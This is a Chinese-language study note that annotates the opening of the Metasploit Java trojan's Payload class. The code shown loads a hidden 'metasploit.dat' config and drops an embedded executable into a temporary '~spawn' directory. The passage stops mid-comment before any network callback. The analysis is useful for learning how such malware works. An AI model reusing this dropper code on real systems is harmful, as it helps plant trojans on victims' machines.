【学习笔记】msf-java木马源码分析

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.DataInputStream;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.io.PrintStream;
import java.net.ServerSocket;
import java.net.Socket;
import java.net.URL;
import java.net.URLConnection;
import java.security.AllPermission;
import java.security.CodeSource;
import java.security.Permissions;
import java.security.ProtectionDomain;
import java.util.Enumeration;
import java.util.Locale;
import java.util.Properties;
import java.util.Stack;
import java.util.StringTokenizer;

public class Payload extends ClassLoader {
//判断当前操作系统
private static final String OS_NAME = System.getProperty("os.name").toLowerCase(Locale.ENGLISH);
//获得当前操作系统类型、将字符转换为小写//getProperty  用指定的键在此属性列表中搜索属性
private static final String PATH_SEP = System.getProperty("path.separator");
//设置分隔符
private static final boolean IS_AIX = "aix".equals(OS_NAME);
//是否是AIX?
private static final boolean IS_DOS = PATH_SEP.equals(";");
//路径分隔符是;吗,以便针对不同系统对路径分割符号的替换
private static final String JAVA_HOME = System.getProperty("java.home");
//获取java安装路径
public static void main(String[] paramArrayOfString) throws Exception {
Properties properties = new Properties();
//读取properties类，创建配置文件
Class clazz = Payload.class;
//通过反射类获取payload 文件路径
String str1 = clazz.getName().replace('.', '/') + ".class";

InputStream inputStream = clazz.getResourceAsStream("/metasploit.dat");
if (inputStream != null) {
  properties.load(inputStream);
  inputStream.close();
} 
String str2 = properties.getProperty("Executable");
//搜索获取可执行文件-->str2获取Executable的值

if (str2 != null) {
  File file1 = File.createTempFile("~spawn", ".tmp");
  file1.delete();
  File file2 = new File(file1.getAbsolutePath() + ".dir");
  //如果字段不为空，则获取路径并创建文件-->~spawn.tmp.dir
  file2.mkdir();
  File file3 = new File(file2, str2);
  //创建文件
  writeEmbeddedFile(clazz, str2, file3);
  //并在创建的dir下创建目录Executable
  properties.remove("Executable");
  //删除配置文件中的Executable
  properties.put("DroppedExecutable", file3.getCanonicalPath());
  //DroppedExecutable写入值，值为新创建的文件的路径
} 
通过反射获取payload对象后创建文件并将executable的值传入后删除

int i = Integer.parseInt(properties.getProperty("Spawn", "0"));
//i获取spa